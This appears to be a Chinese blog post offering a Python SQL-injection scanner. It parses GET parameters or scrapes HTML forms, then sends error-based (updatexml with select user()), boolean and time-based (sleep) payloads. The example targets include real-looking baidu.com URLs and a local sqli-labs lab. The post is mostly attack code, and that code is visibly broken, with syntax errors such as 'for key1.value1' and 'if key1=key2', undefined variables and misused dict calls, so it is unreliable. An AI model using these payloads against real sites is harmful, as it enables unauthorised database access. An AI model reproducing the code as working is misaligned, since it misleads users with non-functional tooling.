漏洞扫描器–无验证码的sql注入扫描

本人原本是不想写sql注入内容的代码的,个人在实际操作,都是直接改sqlmap跑,但想到以后在实际应用中可以跑些有验证情况的注入,先写这个为下一篇做铺垫

payload与鉴别情况还极其不够完善(这是个人不愿意写这个的重要原因,要考虑处理的情况太多,情愿每次遇到实际的直接改具体代码跑)

#coding=utf-8
import requests
import re
import time
class Sql_Inject(object):
    def __init__(self,data_dict):
        self.url=data_dict["url"]
        self.data=data_dict["data"]
        self.head_option=data_dict["head_option"]
        self.note=[""]  #
        # fuzz 测试的payload与响应情况
        self.fuzz_payloads={"'":"SQL syntax",\
                            "'+and+updatexml(0x3a,concat(1,(select user())),1)--+-":"XPATH syntax error"}
    def run(self):
        self.judge_method()
    def deal_(self):
        pass
    def judge_method(self):
        if self.head_option.lower()=="get":
            # http://www.baidu.com/index.php?id=1&pid=2&gid=2
            if "&" in self.url:
                temp_1=self.url.split("&")
                # print(temp_1)
                temp_1[0]=temp_1[0].split("?")[1]
                GET_parameters=temp_1
                # print(GET_parameters)
                for i in GET_parameters:
                    temp_params = i.split("=")[0]
                    params.update({temp_params: i.split("=")[1]})
            # http://www.baidu.com/index.php?id=1
            else:
                GET_parameters=self.url.split("?")[1]
                temp_params=GET_parameters.split("=")[0]
                params.update({temp_params:""})
                # print(GET_parameters)
            # 将url参数划分输入转化为字典
            self.Inject(self.url,params)
        else:
            # post类型请求,拿出form表单数据 转化为字典传入
            s=requests.get(self.url)
            rep1  = re.findall("form action.*?post",s.text)
            rep2 = re.findall("form action.*?POST", s.text)
            if rep1 or rep2:
                res1=re.findall("<form.*?</form>",str(s.content))
                # print(s.text)
                """
                <form action="" name="form1" method="post">
                <div style="margin-top:15px; height:30px;">Username :    
                <input type="text"  name="uname" value=""/></div><div> Password  :    
                <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;">
                <input type="submit" name="submit" value="Submit" /></div>
                </form>
                """
                # print(res1)
                for i in res1:
                    res2=re.findall("<input.*?>",i)
                    post_data=dict()
                    for j in res2:
                        # print(type(j))
                        ss=j.split(" ")
                        # print(ss)
                        """
                        ['<input', 'type="text"', '', 'name="uname"', 'value=""/>']
                        ['<input', 'type="text"', 'name="passwd"', 'value=""/>']
                        ['<input', 'type="submit"', 'name="submit"', 'value="Submit"', '/>']
                        """
                        for x in ss:
                            if "name" in x:
                                x = x.split("=")[1].strip("\"").strip("'")
                                post_data.update({x: ""})
                    print(post_data)
                    self.Inject(self.url,post_data.pop("submit"))
                    #post sql
            # print(s.text)
    def Inject(self,url,post_data):
        target = url  #
        for key1.value1 in post_data.items():
            temp_target = self.url
            temp_payload = ""
            # fuzz匹配
            for payload, result in self.fuzz_payloads.items():
                for key2, value2 in post_data.items():
                    if key1=key2:
                        post_data.update({key1: payload})
                if self.head_option.lower()=="post":
                    post_data.update({"submit":"submit"})
                    rep = requests.post(url=self.url, data=post_data, timeout=6)
                else:
                    rep = requests.get(url=self.url, params=post_data, timeout=6)
                # print(rep.text)
                # 比较是否符合,进行加权
                if result in rep.text:
                    assign_weight = assign_weight + 1
                # print(assign_weight)
            payload = "'+and+'1'='2'--%20-"
            post_data.pop("submit")
            # 简单的and判断
            for key, value in post_data:
                post_data.update({key: payload})
                if self.head_option.lower()=="post":
                    post_data.update({"submit":"submit"})
                    before_text = requests.post(url=self.url, data=post_data, timeout=6)
                    after_text = requests.post(url=self.url, data=post_data, timeout=6)
                else:
                    before_text = requests.get(url=self.url, params=post_data, timeout=6)
                    after_text = requests.get(url=self.url, params=post_data, timeout=6)
                if before_text != after_text:
                    assign_weight = assign_weight + 1
            # 简单的延时判断
            payload = "s8323'+or+sleep(10)--%20-"
            post_data.pop("submit")
            for key, value in post_data:
                post_data.update({key: payload})
                strat_time = time.time()
                if self.head_option.lower()=="post":
                    post_data.update({"submit":"submit"})
                    rep = requests.post(url=self.url, data=post_data, timeout=6)
                else:
                    rep = requests.get(url=self.url, params=post_data, timeout=6)
                if time.time() - strat_time > 10:
                    assign_weight = assign_weight + 1
            # print(assign_weight)
url_1="http://www.baidu.com/index.php?id=1"
url="http://www.baidu.com/index.php?id=1&pid=2&gid=3"
url_2="http://192.168.85.136:9096/sqli-labs-master/Less-1/?id=1"
url_3="http://192.168.85.136:9096/sqli-labs-master/Less-11/"
data_dict={"url":url_3,"data":"","head_option":"post"}
Sql_Inject(data_dict).run()

2019.6.10